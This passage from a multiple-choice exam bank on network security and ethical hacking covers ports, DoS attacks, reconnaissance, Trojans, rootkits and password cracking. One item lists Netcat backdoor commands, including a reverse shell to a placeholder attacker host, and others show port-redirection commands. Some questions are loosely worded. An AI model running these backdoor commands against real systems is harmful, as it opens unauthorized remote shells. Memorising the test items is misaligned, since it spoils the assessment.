c) The hacker is trying to get personal information from the user over the phone.
d) The hacker is trying to connect to the user's wireless home network.

99. Which of the following are TRUE about a Script Kiddie?
i. With low-level hacking skills
ii. Use released tools and software to exploit without understanding the underlying vulnerability
iii. Biggest group of attackers and usually rather immature
iv. Use Social Engineering technique

a. i, ii and iii;
b. i, ii and iv;
c. ii, iii and iv;
d. i, ii, iii and iv.

100. Passwords can be intercepted as they move through networks via which of the following?
a) Keyboard sniffers
b) Password sniffers
c) Trojan horses
d) Cookies

101. Which of the following is the process of identifying and reducing risk to a level that is comfortable and then implementing controls to maintain that level?
a) Return on investment
b) Risk
c) Risk analysis
d) Risk management

102. Which of the following is the best option for a network administrator to prevent an attacker from figuring out users' IDs or passwords?
a) Session Hijacking
b) URL Session Tracking
c) Disable cookies
d) Hidden form elements

103. Which of the following statements is FALSE about ICMP (Internet Control Message Protocol)?
a) ICMP was essentially designed for the troubleshooting of routing and connectivity issues in IP networks
b) ICMP “mapping” is often conducted via a ping sweep
c) ICMP manipulates the time-to-live (TTL) option in UDP packets
d) ICMP message types reply from the target provide a great deal of information to hackers about host connectivity and the hop count to a particular system

104. TCP/IP family of protocols includes several components:
i. Transmission Control Protocol (TCP);
ii. User Datagram Protocol (UDP);
iii. Internet Protocol (IP);
iv. Internet Control Message Protocol (ICMP)

a) i and ii;
b) ii and iii;
c) i, ii and iii;
d) i, ii, iii and iv.

105. Illegal or unauthorized zone transfers are a significant and direct threat to what type of network server?
a) Web
b) DHCP
c) DNS
d) Database

106. ________ is the protocol Microsoft uses to share files, printers, and serial ports, and also to communicate between computers using named pipes.
a) Server Message Block (SMB)
b) Resource Control Block (RCB)
c) Traffic Message Block (TMB)
d) Communication Message Block (CMB)

107. Which of the following measures can be used to defend against Network Mapping?
i. Filter out the underlying message that network mapping tools rely on by using firewalls and the packet filtering router;
ii. Block incoming ICMP message;
iii. Filter ICMP_TIME_EXCEEDED messages leaving your network to stymie an attacker using traceroute;
iv. To prevent an attacker from discovering open ports on your machine is to close all unused ports

a) i and ii;
b) ii and iii;
c) i, ii and iii;
d) i, ii, iii and iv.

108. You can start to build defenses for your information system by creating security ____________.
a) foundations
b) baselines
c) pillars
d) planes

109. Under Phase of Attacks, DoS (Denial-of-Service) Attack is considered as which phase?
a) Reconnaissance;
b) Scanning;
c) Gaining Access;
d) Maintain Access;

110. Which type of Buffer Overflow Exploits allows an attacker to access the system as an impersonated root user?
a) Program Buffer Overflow
b) Heap Overflow
c) Stack-based Buffer Overflow
d) Memory buffer Overflow

111. Which of the following techniques are considered as Malformed Packet DoS Attacks?
i. Land
ii. Ping of Death
iii. Rose
iv. Bonk

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

112. Running the following command at the PC with IP address 192.168.1.2. What does it mean? fpipe –l 1000 –r 5000 192.168.1.23
i. It is port redirection;
ii. Setup the PC (192.168.1.2) to listen to port 5000;
iii. PC 192.168.1.2 will pick up traffic entering at port 1000;
iv. The traffic arrives at port 1000 will be redirected to PC 192.168.1.23 at port 5000.

a) i, ii and iii;
b) i, iii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

113. You are the security administrator for a bank. The users are complaining about the network being slow. However, it is not a particularly busy time of the day. You capture network packets and discover that hundreds of ICMP packets have been sent to the host. What type of attack is likely being executed against your network?
a) Spoofing
b) Man-in-the-middle
c) DNS kiting
d) Denial of service

114. Which of the following is Not the functionality of BOTs software?
a) DoS flood
b) File morphing
c) Special UDP port scanning
d) E-mail address harvester

115. The File Transfer Protocol (FTP) can be accessed by each of the following except ________.
a) Web browser
b) FTP client
c) command line
d) LPTP server

116. The Transmission Control Protocol/Internet Protocol (TCP/IP) protocol that handles outgoing mail using port 25 is ______.
a) Simple Mail Transfer Protocol (SMTP)
b) Post Office Protocol (POP)
c) Internet Mail Access Protocol (IMAP)
d) Secure/Multipurpose Internet Mail Extensions (S/MIME)

117. What is the best measure to keep zombies off the system?
a) limit bandwidth
b) install DDoS detection and throttling tools on your network
c) employ egress anti-spoof filters on external routers or firewall.
d) deploy filters upstream to block flood traffic.

118. Which of the following represent the pool of well-known ports?
a) 0 through 255
b) 0 through 1023
c) 0 through 49151
d) 1024 through 49151

119. To prevent an attacker from discovering open ports on your machine is to _______.
a) close all unused ports
b) assign strong passwords to all ports
c) hide all ports
d) terminate services on open ports

120. Which of the following advantages are associated with using a firewall?
a) It provides an inexpensive means to share the Internet connection.
b) It is used to block undesired external access to internal network resources.
c) It is used to monitor the use of Internet by internal users.
d) It is used to hide the internal addressing scheme of the network.

121. After running John the Ripper, the cracked password is stored in a local file called ________.
a) John.pot
b) Ripper.pot
c) Password.pot
d) Crack.pot

122. General types of reconnaissance data that can be obtained from the Internet are:
i. Employee data
ii. Business partner
iii. Existing technologies
iv. Financial information

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

123. Internet search engines are used by attackers because they provide the following facilities except ________.
a) Internet directories
b) Link crawlers
c) Caches
d) Hyperlinks

124. Which software tool can be used for cracking Windows 95, Windows 98, SQL 2000, Cisco PIX, and router MD5 hashes?
a) John the Ripper
b) Brutus
c) Super Cracker
d) Cain

125. An attack that opens numerous ports for bogus connections, thereby denying legitimate connections, is called a ______.
a) ACK Flood
b) TCP/UDP Flood
c) Port Flood
d) SYN Flood

126. Which of the following statements is FALSE about Risk Management?
a. Risk can be qualitatively defined in three levels: Low, Medium and High
b. Risk Management is about Security
c. Risk management determines the value of the resources and the level of security for it
d. Threat + Vulnerability = Risk

127. A(n) __________ is a weakness that allows a threat agent to bypass security.
a) vulnerability
b) exploit
c) risk
d) mitigation

128. Which of the following is an advantage of using virtual machines?
a) Reduces the need to install OS software updates.
b) Allows an OS to run in its own separate, secure area on a system.
c) Helps secure the hardware from unauthorized access.
d) Anti-virus software has to be installed only once.

129. A host has an IP address of 128.78.3.2. The network is subnetted by borrowing the first 3 bits of host address bits. What is the subnet mask for 128.78.3.2?
a) 255.255.224.255
b) 255.255.0.0
c) 255.255.255.224
d) 255.255.224.0

130. Each of the following protocols can be used to encrypt transmissions over the Internet except _________.
a) Common Gateway Interface (CGI)
b) Secure Sockets Layer (SSL)
c) Personal Communications Technology (PCT)
d) FORTEZZA

131. The following are commonly used techniques for reconnaissance except ________.
a) Low-technology reconnaissance
b) Web searches
c) Whois database analysis
d) High performance hardware

132. Which of the following IP address classes is reserved for future use?
a) Class A
b) Class C
c) Class D
d) Class E

133. There are two ways that a SYN flood can exhaust the communication resources of a target:
i. Flood the connection queue;
ii. Flood the entire communication link;
iii. Flood the switch;
iv. Flood the router.

a) i and ii;
b) i and iii;
c) ii and iii;
d) ii and iv.

134. Which of the following are TRUE about a DDoS (Distributed Denial-of-Service) attack?
i. Distributed Denial-of-Service is a simple SYN flood that allows an attacker to generate traffic from one machine
ii. The attacker first takes over a large number of victim machines around the world, often referred to as zombies.
iii. The zombie software is the component of the DDoS tool that waits for a command from the attacker, who uses a client tool to interact with the zombies
iv. Tribe Flood Network 2000 (TFN2K) is one of the most fully featured DDoS-specific tools

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

135. What is the name of the unique physical address that is assigned to every network interface card?
a. IP address
b. Hostname
c. MAC address
d. NetBIOS name

136. What does an attacker do in Reconnaissance Phase?
i. An attacker seeks to gather as much information as possible about a target of evaluation prior to launching an attack
ii. The core of Reconnaissance attack is intrusive information gathering techniques
iii. System is breached or accessed in order to retrieve information

a. i only;
b. i and ii;
c. i, ii and iii;
d. None of the above.

137. A(n) _______ identifies what program or service on the receiving computer is being accessed.
a) process
b) UPD designator
c) port number
d) service-initiated socket (SIS)

138. Which of the following is a coordinated effort in which multiple machines attack a single victim or host with the intent to prevent legitimate service?
a) DoS
b) Masquerading
c) DDoS
d) Trojan Horse

139. Which of the following statements is FALSE about the key terms used in the risk management process?
a. A Resource is anything in an environment that you are trying to protect
b. A Threat is a resource that can be accessed by making use of a vulnerability in your environment
c. A Vulnerability is a point where a resource is susceptible to attack
d. Countermeasures are deployed to counteract threats and vulnerabilities, therefore reducing the risk in your environment

140. IP resides at which layer of the OSI model?
a) Application
b) Data Link
c) Network
d) Physical

141. The qualities and characteristics of the network traffic generated by Nmap's ping scan are called its _________.
a) signature
b) socket
c) scan profile
d) stealth

142. Which of the following statements are TRUE about Trojan horse?
i. Most Trojan horses have two parts: Server and Client;
ii. The server-program part is a program or file that is installed on the victim’s machine;
iii. The client-program part is on the attacker’s system;
iv. Trojan horse attacks pose one of the most serious threats to computer security.

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

143. An attacker normally takes inventory of which type of ports on the system?
a) well done ports.
b) easy ports.
c) open ports.
d) unsecured ports.

144. What is the usage of Cookie?
a) to prevent sniffing
b) to prevent ARP cache poisoning
c) to prevent spoofing
d) to prevent SYN flooding

145. Which of the following is FALSE about User Datagram Protocol (UDP)?
a) It is a connection protocol
b) Packets transmitted are not put in order
c) No packet lost retransmission
d) No acknowledgement or session tear down required

146. Each machine with a TCP/IP stack has ______ TCP ports and ______ UDP ports.
a) 65536 and 65536
b) 32768 and 32768
c) 32768 and 65536
d) 65536 and 32768

147. You connected your company to the Internet, and security is a concern. What should you install?
a) Higher-quality servers
b) Firewall
c) DNS
d) Switches

148. A port scanner has reported that your web server running with a supporting SQL database is listening on TCP ports 80, 443, 21, and 1433. Which of these ports is unnecessary and should be closed to prevent hacking attempts?
a) 80
b) 21
c) 1433
d) 443

149. Each of the following is intended to protect information except __________.
a) people
b) policies
c) equipment
d) confidentiality

150. An attacker can ask the server to send all information it has about a given domain by requesting a ________ from the name server.
a) domain transfer
b) nslookup
c) zone transfer
d) display all

151. Which application-level Trojan backdoor is able to modify or replace critical operating system executable programs or libraries?
a) Operating-Mode Rootkits
b) System-Mode Rootkits
c) User-Mode Rootkits
d) Kernel-Mode Rootkits

152. Each of the following is an attribute that should be compiled for hardware when performing an asset identification except __________.
a) the name of the equipment
b) the manufacturer's serial number
c) the MAC and IP address
d) the cost

153. Which of the following is not a well known TCP port number?
a) 8888
b) 53
c) 80
d) 25

154. An attacker with a low skill level is called a ________.
a. Cracker
b. Hacker
c. Script Kiddie
d. Phreaker

155. _______ is the interception of network data not intended for the machine that is intercepting the traffic.
a) Packet sniffing
b) Packet spoofing
c) Packet stealing
d) Packet engineering

156. The following are useful data elements from the Registrar of Whois Search except _______.
a) Names
b) Registration dates
c) Hardware models
d) Name servers

157. A person wishing to prevent users from accessing a web server and the information on it would try a ____ attack.
a) web service
b) denial of service
c) system service
d) internet service

158. Attackers known as ____________ like to think of themselves as an elite group who are performing a valuable service in identifying security weaknesses.
a) crackers
b) script kiddies
c) hackers
d) cyberterrorists

159. Which of the following is Not a functional feature of Kernel-Mode Rootkits?
a) Hide an attacker's processes.
b) Hide selected types of events from the Windows Event Viewer.
c) Hide the ports used by an attacker.
d) Hide device drivers, including itself, so an administrator cannot see them installed on the system.

160. Which of the following is not a feature or capability of a port scanner?
a) Determine open ports
b) Determine active services
c) Determine target OS
d) Determine weakness of OS

161. What is the purpose of a site survey?
a) Improve wireless signal strength
b) Eliminate unwanted access locations
c) Distribute WEP keys
d) Plan the design of a wired network

162. During an audit of a server system log, which of the following entries would be considered a possible security threat?
a) Five failed login attempts on an admin account.
b) Two successful logins with the backup account.
c) A 500K print job sent to a printer.
d) Three new files saved in the accounting folder by user finance.

163. In order to determine which class any IP address is in, one should examine the first _____ bits of the IP address.
a) 8 bits
b) 3 bits
c) 4 bits
d) 5 bits

164. Which of the following software is a good port scanning tool?
a) Telnet
b) Nmap
c) ipconfig
d) portscan

165. Which software tool can be used for sniffing password?
a) John the Ripper
b) Brutus
c) John the Sniffer
d) Cain

166. You are connected to a server on the Internet and you click on a link on the server and receive a time-out message. What layer could be the cause of this message?
a) Application
b) Transport
c) Network
d) Physical

167. Which Netcat command is used as a backdoor on window systems?
a) c:\>nc -l -p 12345 -e cmd.exe
b) c:\>nc -l -p 12345 -e /bin/sh
c) c:\>nc -l -p 12345 -e ncrelay.bat
d) c:\>nc [attackers_machine] 12345 -e /bin/sh

168. In the TCP header, there are ______ TCP control bits, also known as the TCP flags.
a) 6
b) 7
c) 8
d) 9

169. Which of the following is NOT a countermeasure for password attacks?
a) adopt a strong password policy.
b) educate user to security awareness.
c) conduct password cracking tests.
d) store encrypted or hashed password files in user account.

170. HTTP, FTP and Telnet work at which layer of the OSI model?
a) Application
b) Presentation
c) Session
d) Transport

171. Which of the following is a weak password policy?
a) use minimum of nine alphanumeric characters
b) implement aging password
c) use passphrases
d) use dictionary form password

172. Which type of Buffer Overflow Exploits will cause the operating system to shutdown or crash?
a) Program Buffer Overflow
b) Heap Overflow
c) Stack-based Buffer Overflow
d) Memory buffer Overflow

173. Which software is used to extract password representations?
a) Cracker
b) John the Ripper
c) Pwdump3
d) Brutus

174. For a DoS (Denial-of-Service) Attack, stopping service can be achieved by:
i. Process killing
ii. Process crashing
iii. System reconfiguring
iv. Malformed packet attacks

a) i, ii and iii;
b) i, ii and iv;
c) i, iii and iv;
d) i, ii, iii and iv;

175. _______ is the method used by Nmap to determine the operating system of the target computer.
a) Stack fingerprinting
b) OS fingerprinting
c) Banner stamping
d) OS stamping

176. Metasploit offers a huge set of _____, that is, the code the attacker wants to run on the target machine, triggered by the exploit itself.
a) payloads
b) options
c) utilities
d) exploits

177. The Internet is “managed” by
a. APNIC
b. ICANN
c. AfriNIC
d. ARIN

178. A password cracker is needed to quickly rediscover a password. It is believed the password is only seven characters long, but was computer generated. Which of the following techniques would be the best method to use?
a) Online guessing
b) Dictionary
c) Brute force
d) Hybrid

179. Each of the following is a characteristic of information except __________.
a) integrity
b) confidentiality
c) conformity
d) availability

180. The use of Domain Name System (DNS) is to _________.
a) translate computer's domain name into its appropriate IP address.
b) translate IP address into its appropriate computer's domain name.
c) translate computer's IP address into its appropriate MAC address.
d) check for the correct computer's domain name.

181. Which of the following is a hardware or software system used to protect a network from unauthorized access?
a) Firepot
b) Windows XP
c) Honeypot
d) Firewall

182. Which one of the following is not a private IP address?
a) 10.1.2.1
b) 165.193.123.44
c) 172.18.36.4
d) 192.168.0.234

183. The most widely-deployed tunneling protocol is _________.
a) L2TP
b) RADIUS
c) PPP
d) PPTP

184. What port does the netbus server listen on?
a) 12345
b) 12346
c) 12347
d) any number greater than 12347

185. Which of the following SuperScan's tool is used to uncover the users account list at the target machine?
a) User Account Exploit
b) User engineering
c) Windows Enumeration
d) Windows User Exploit

186. Which of the following best describes a vulnerability?
a) A weakness in the configuration of software or hardware that could allow a threat to damage the network
b) Any agent that could do harm to your network or its components
c) The likelihood of a particular event happening given an asset and a threat
d) Measures the cost of a threat attacking your network

187. Which of the following is associated with behaviors such as collecting personal information or changing your computer configuration, without appropriately obtaining prior consent?
a) Trojan
b) Botnet
c) Spyware
d) Rootkit

188. You suspect that a system is infected with a Trojan Horse program and is sending data outbound from the system. Which of the following can be used to detect this activity?
a) Anti-spam software
b) Pop-up blocker
c) HIDS
d) Personal firewall

189. The most effective method of defending against social engineering is _________.
a) user awareness
b) strong password
c) anti-social
d) high end security tools

190. In Microsoft Windows, the name of the background program, such as Svchost.exe, is called a ________.
a) process
b) service
c) display service
d) parent service

191. Each of the following is a hacker's activity profile category except __________.
a) black hats
b) white hats
c) green hats
d) grey hats

192. What is usually the first phase conducted before doing a site penetration?
a) Information gathering
b) Cracking
c) Social engineering
d) Spoofing

193. Each of the following is an authentication technology except _________.
a) IEEE 802.11b
b) RADIUS
c) TACACS+
d) IEEE 802.1X

194. Which of the following is a correct URL of a web site using the SSL protocol?
a) http://www.sp.edu.sg
b) httpssl://www.sp.edu.sg
c) http://www.sp.edu.sg/ssl
d) https://www.sp.edu.sg

195. Which of the following protocol does Ethereal indicate when you launch a Web browser?
a) HyperText Transfer Protocol (HTTP)
b) Address Resolution Protocol (ARP)
c) Transmission Control Protocol(TCP)
d) Internet Control Message Protocol (ICMP)

196. A network-based IDS is not suitable for detecting or protecting against which of the following?
a) E-mail spoofing
b) Denial-of-service attacks
c) Attacks against the network
d) Attacks against an environment that produce significant traffic

197. What is the purpose of Banner grabbing?
a) Is to grab the version of operating system used by target machine and its exploits.
b) Is to grab the message of the day banner from the network router.
c) Is to gain access to the system to look for which Web Server Application is running, its version and exploits.
d) is to extract a copy of Web server home page.

198. One reason employees are so successful at attacking their company's computers is __________.
a) they have superior networking skills
b) employees already have access to some company information
c) a company's information security is focused on keeping out intruders
d) employees have unlimited access to company computers

199. _______ and _______ are examples of Trojan programs.
a) Netbus, subseven
b) Netbus, supertrojan
c) Back Orifice, subeight
d) Back Orifice, supertrojan

200. Which is the best countermeasure to social engineering attacks?
a) Preventing the download of mobile code from the Internet
b) Employee training
c) Strong password policies
d) Auditing user activities

201. Which software tool can be used for port redirection apart from WinRelay?
a) PWdump3
b) Remote-Anything
c) Fpipe
d) DCOM RPC Exploit

202. Which protocol uses port 22 by default?
a) Telnet
b) FTP
c) SSH
d) HTTPS

203. Which type of buffer overflow exploit allows an attacker to install backdoor programs on a victim's machine?
a) Program Buffer Overflow
b) Heap Overflow
c) Stack-based Buffer Overflow
d) Memory buffer Overflow

204. A computer system is suspected of carrying a rootkit. What is the most efficient method of removing the rootkit?
a) Install anti-spyware software.
b) Disable the BIOS of the computer system and reboot.
c) Install the latest operating system update patch.
d) Reinstall the operating system.

205. Another name for anonymous FTP is _________.
a) blind FTP
b) free user FTP
c) Freenet
d) Unannounced FTP

206. Performing a ______ scan with Nmap can help an attacker avoid detection.
a) silent
b) secret
c) stealth
d) smooth

207. Each of the following is a phase of a malicious hacker attack except __________.
a) reconnaissance
b) clearing tracks
c) social engineering
d) scanning

208. Which of the following describes a passive attack?
a) Does not insert data into the stream but instead monitors information being sent.
b) Records and replays previously sent valid messages.
c) Inserts false packets into the data stream.
d) Makes attempts to verify the identity of the source of information.

209. Explain the command execution statement as shown: winrelay -lip 192.168.20.2 -lp 1002 -dip 193.21.74.35 -dp 1020 -tcp
a) TCP traffic is redirected from source 192.168.20.2 at port 1002 to destination address 193.21.74.35 port 1020.
b) TCP traffic is redirected from source 192.168.20.2 at port 1020 to destination address 193.21.74.35 port 1002.
c) TCP traffic is redirected from source 193.21.74.35 at port 1020 to destination address 192.168.20.2 port 1002.
d) Traffic is redirected from source 192.168.20.2 at port 1002 to destination address 193.21.74.35 port 1020.

210. A person who applies his hacking skills for offensive purposes is known as a _________.
a) Cracker
b) White Hat
c) Ethical Hacker
d) Phreaker

211. Which of the following is an example of social engineering?
a) An attacker configures a packet sniffer to monitor user logon credentials.
b) An attacker sets off a fire alarm so that he can access a secured area when the legitimate employees are evacuated.
c) An attacker waits until legitimate users have left and sneaks into the server room through the raised floor.
d) An attacker unplugs a user's network connection and then offers to help try to correct the problem.

212. Which of the following statements best describes a zombie?
a) It executes instruction commands simultaneously to conduct a DoS attack; it is triggered by another system which is a client of the attacker's system.
b) It is a Netcat client of an attacker's system. This client in turn triggers a DoS attack at the target system.
c) It is an unintelligent system that attacks the target system with fragmented packets.
d) It is an unintelligent system that sleeps when its resources are exhausted by a DoS attack.

213. Which of the following is NOT a correct method to enforce a strong password policy?
a) Enable the password complexity requirement.
b) Use a password filtering program.
c) Use a combination of standard and special characters.
d) Encourage users to use special and difficult words.

214. You need to have secure communications using HTTPS. What port number is used by default?
a) 53
b) 23
c) 80
d) 443

215. Which of the following is the strongest form of authentication?
a) Biometric
b) Two-factor
c) Something you have
d) Username and password

216. Each of the following is a type of attack except __________.
a) Access Attack
b) Denial of Service Attack
c) Security Attack
d) Repudiation Attack

217. Which of the following tools would be able to capture and view network packets that were transmitting passwords in clear text?
a) Vulnerability scanner.
b) Password cracker.
c) Network mapper.
d) Protocol analyzer.

218. The following are defence practices against DNS-based reconnaissance except _________.
a) Domain names should not indicate any machine's operating system type.
b) Restrict zone transfers.
c) Block all ports except port 80.
d) User Datagram Protocol (UDP) port 53, used for DNS queries and responses, must be allowed for DNS to resolve names.

219. Each of the following is a characteristic of the Layer 2 Tunneling Protocol (L2TP) except _________.
a) It merges the features of PPTP and Layer 2 Forwarding Protocol (L2F)
b) It requires a TCP/IP network
c) It can be implemented on devices like routers
d) It can support advanced encryption methods

220. To be beneficial to a company, which of the following is the most practical relationship between a security risk and its countermeasure?
a) The cost of the countermeasure should be less than the potential cost of the risk.
b) The cost of the countermeasure should be greater than the potential cost of the risk.
c) The cost of the countermeasure should be less than the cost of the asset.
d) The cost of the countermeasure should be greater than the cost of the asset.

221. What is a default password on a server system?
a) A password that is set by the system manufacturer.
b) A password that is set by the first user.
c) The password is "default".
d) A password that is set by the administrator.

222. The premise behind reconnaissance activities is to profile the following except _________.
a) size of organisation
b) administrative staff
c) network infrastructure
d) an organisation's operations

223. Which TCP/IP utility is most often used to test whether an IP host is up and functional?
a) ftp
b) telnet
c) ping
d) netstat

224. Which of the following is not one of Google's important technologies?
a) Google help
b) Google cache
c) Google index
d) Google bots

225. Which of the following is NOT a type of port scanning?
a) IP Protocol Scan
b) Busy Scan
c) Idle Scan
d) UDP Port Scan

226. What is a blind FTP site?
a) A site where users don't authenticate
b) A site where all traffic is encrypted
c) A site where only anonymous access is allowed
d) A site where users can upload but not download

227. What is the name given to the activity that involves collecting information that will later be used for monitoring and review purposes?
a) Logging
b) Auditing
c) Inspecting
d) Vetting

228. Which of the following sentences best describes SYN cookies?
a) It is a SYN packet that consists of SYN-ACK and RESET signals.
b) It is a SYN grabber that grabs a session sequence number.
c) It is a single value created by applying a cryptographic one-way hash function to the source and destination IP addresses, port numbers and a secret number.
d) It is a special number that provides the source and destination IP addresses and the session sequence number.

229. The objectives of port scanning are to identify the following except ______.
a) Hardware model number
b) Open ports
c) Host operating system
d) Software or service versions

230. Each of the following can be identified as physical security except __________.
a) door locks
b) alarm systems
c) antivirus software
d) lighting

231. A host has a Class B IP address of 128.78.0.2. Which network address does this host belong to if there is no subnetting?
a) 128.78.0.0
b) 128.78.1.0
c) 128.78.2.0
d) 128.78.3.0

232. When an attacker interacts with a Web application and starts to guess the IDs and passwords of that session, this form of Web attack is known as ______.
a) Session Hijacking
b) URL Session Tracking
c) Account Harvesting
d) Web Harvesting

233. A rootkit has been discovered on your mission-critical database server. What is the best step to take to return this system to production?
a) Download history
b) Run an antivirus tool
c) Install an HIDS
d) Apply vendor patches

234. If the attack is process killing, to which of the following categories of Denial-of-Service attack does it belong?
a) Locally stopping services
b) Remotely stopping services
c) Locally exhausting resources
d) Remotely exhausting resources

235. Services using an interprocess communication share such as network file and print sharing services leave the network susceptible to which of the following attacks?
a) Spoofing
b) Null sessions
c) DNS kiting
d) ARP poisoning

236. Which of the following components of an IP address is used to distinguish the network address from a host address?
a) Default gateway
b) Subnet mask
c) DNS server
d) WINS server

237. The purpose of Ethereal's Filter option is to view the desired _________.
a) Source
b) Destination
c) Info
d) Protocol

238. Explain the command execution statement as shown: fpipe -l 8081 -r 8080 192.168.1.5
a) redirect traffic from local machine at port 8081 to 192.168.1.5 port 8080.
b) redirect traffic from port 8081 to port 8080 on the same machine with IP address 192.168.1.5.
c) redirect traffic from local machine at port 8080 to 192.168.1.5 port 8081.
d) redirect traffic from port 8080 of 192.168.1.5 to port 8081 of the attacker's system.

239. Which layer of the OSI model is responsible for converting data into signals appropriate for the transmission medium?
a) Application
b) Network
c) Data Link
d) Physical

240. The following are the most notable password cracking tools except ______.
a) SuperCracker
b) Cain
c) John the Ripper
d) Pandora

241. Password guessing tools are useful in finding passwords on a target machine, except that ______.
a) they are difficult to use
b) they might take too long
c) they do not offer a brute-force selection feature
d) their word library is too small

242. A port scan has been performed on your e-mail server. Which of the following services and ports should be disabled?
a) TCP port 21.
b) TCP port 25.
c) TCP port 110.
d) TCP port 143.

243. Which of the following devices connects different network segments and uses tables to create a map of the network topology?
a) Switch
b) Router
c) Bridge
d) Hub

244. What port is used for a DNS zone transfer?
a) 53
b) 80
c) 135
d) 137

245. What is the best countermeasure against malicious code?
a) Manage user behavior
b) Prevent reuse of external removable media
c) Use antivirus software
d) Disable mobile code on web browsers

246. Which utility can you use to find the MAC and TCP/IP addresses of your Windows workstation?
a) ping
b) ipconfig
c) ipconfig /all
d) tracert

247. The following are defences against password cracking attacks except _______.
a) anti-password cracking software
b) strong password policy
c) password filtering software
d) use other authentication tools

248. Which of the following web server characteristics would be flagged as a risk by a vulnerability scanner?
a) Operating system not updated to latest patch level.
b) HTTPS server listening on port 443.
c) Network packets being sent in clear text.
d) HTTP server listening on port 80.

249. Which of the following is a valid Google search command to look for all text files containing "secret"?
a) site:all filetype:txt secret
b) site:com filetype:txt secret
c) site:org filetype:txt secret
d) site:net filetype:txt secret

250. Firewalls provide security through what mechanism?
a) Watching for intrusions
b) Controlling traffic entering and leaving a network
c) Requiring strong passwords
d) Preventing misuse of company resources

251. When the telnet service is activated, it is accessed through ______.
a) TCP port 21
b) TCP port 80
c) TCP port 23
d) TCP port 25

252. The Ethereal packet capturing process would display the following except ______.
a) User id and password
b) Source
c) Destination
d) Protocol

253. You want to use NAT on your network, and you have received a Class C address from your ISP. What range of addresses should you use on the internal network?
a) 10.x.x.x
b) 172.16.x.x
c) 172.31.x.x
d) 192.168.x.x

254. Which of the following files is most likely to contain a virus?
a) database.dat.
b) bigpic.jpeg.
c) note.txt.
d) picture.gif.exe.

255. An attacker trying to exploit a web server will likely want to scan systems running web services. What port will the attacker scan for?
a) 21
b) 25
c) 80
d) 110
